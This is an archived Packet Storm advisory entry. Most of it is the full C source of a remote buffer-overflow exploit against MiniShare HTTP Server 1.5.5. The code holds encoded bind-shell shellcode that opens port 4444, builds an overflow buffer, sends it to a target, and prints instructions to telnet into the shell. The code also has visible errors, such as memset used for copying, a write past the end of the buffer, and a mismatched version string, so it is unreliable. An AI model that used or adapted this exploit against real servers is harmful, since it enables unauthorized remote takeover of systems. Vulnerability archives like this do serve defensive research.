MiniShare HTTP Server 1.5.5 Buffer Overflow

2009-10-20T00:00:00
ID PACKETSTORM:82068
Type packetstorm
Reporter iM4n
Modified 2009-10-20T00:00:00

Description

                                        
                                            `/*  
  
MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM  
  
This bug Expl0ited and Discovered by iM4n  
  
Sp Tnx2 : Shabgard & Aria Security FOrum  
  
The Crimson Idol  
  
  
*/  
  
  
  
  
#include <winsock2.h>  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
#include <dos.h>  
#pragma comment(lib, "ws2_32.lib")  
#define buffer 557  
#define PORT 80  
#define NOP 0x90  
  
  
/* Bind Shell open port 4444 */  
char shellcode[]=  
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"  
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"  
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"  
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"  
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"  
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"  
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"  
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"  
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"  
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"  
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"  
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"  
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"  
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"  
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"  
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"  
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"  
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"  
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"  
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"  
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"  
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"  
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"  
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"  
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";  
  
  
  
  
  
int main(int argc, char *argv[])  
{  
  
int mini1,mini2,tcp;  
  
  
if (argc < 3)  
{  
printf("\n MiniShare HTTP Server 1.5.4 Remote Buffer overflow Exploit by eMP3R0r TEAM \n");  
printf("\n This bug Expl0ited and Discovered by iM4n \n");  
printf("\n Usage : File.exe IPAdress Port \n");  
printf("\n Ex : iM4n.exe 127.0.0.1 80 \n");  
exit(-1);  
  
}  
  
char overflow[buffer];  
memset(overflow,NOP,buffer);  
char win[] = "\xED\x1E\x94\x7C";  
memset(overflow,win,sizeof(win)-1);  
memset(overflow,shellcode,sizeof(shellcode)-1);  
  
overflow[buffer] = 0;  
  
WSADATA wsaData;  
  
if(WSAStartup(MAKEWORD(2,1),&wsaData) != 0 )  
{  
printf("\n windows socket is failed ! \n");  
exit(-1);  
}  
  
struct hostent *remote;  
  
remote = gethostbyname (argv[1]);  
if (! remote)  
{  
mini1=inet_addr(argv[1]);  
  
}  
if ((! remote) && (mini1 == INADDR_NONE))  
{  
printf("\n unable ro resolve %s \n",argv[1]);  
exit(-1);  
}  
  
tcp = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
  
if (! tcp)  
{  
  
printf("\n Socket Not created !\n");  
exit(-1);  
}  
  
struct sockaddr_in http;  
  
if (remote != NULL)  
memset(&(http.sin_addr),remote->h_addr,remote->length);  
else  
http.sin_addr.s_addr = mini1;  
if(remote)  
http.sin_family = remote->h_addrtype;  
else   
http.sin_family = AF_INET;  
http.sin_port = htons(PORT);  
  
printf("\n Attacking on HTTP Server ...! %s\n",argv[1]);  
sleep(400);  
  
printf("\n Sending String on Target ...\n",sizeof(overflow));  
sleep(300);  
  
mini2 = connect (tcp ,(struct sockaddr *) &http,sizeof(struct sockaddr_in));  
if(mini2 == 0)  
{  
  
printf("\n Sending Socket ...!\n");  
sleep(500);  
  
printf("\n connecting ...!\n");  
send(tcp,overflow,sizeof(overflow),0);  
  
printf("\n Exploit Done !\n");   
// attack on port 4444  
printf("\n exploit runed ! please telnet ip address and Port 4444 ! \n");  
}  
  
else  
  
{  
printf("\n Exploit not done and ip address machin not listening in Port 4444! \n");  
}  
shutdown(tcp,1);  
closesocket(tcp);  
  
return 0;  
}`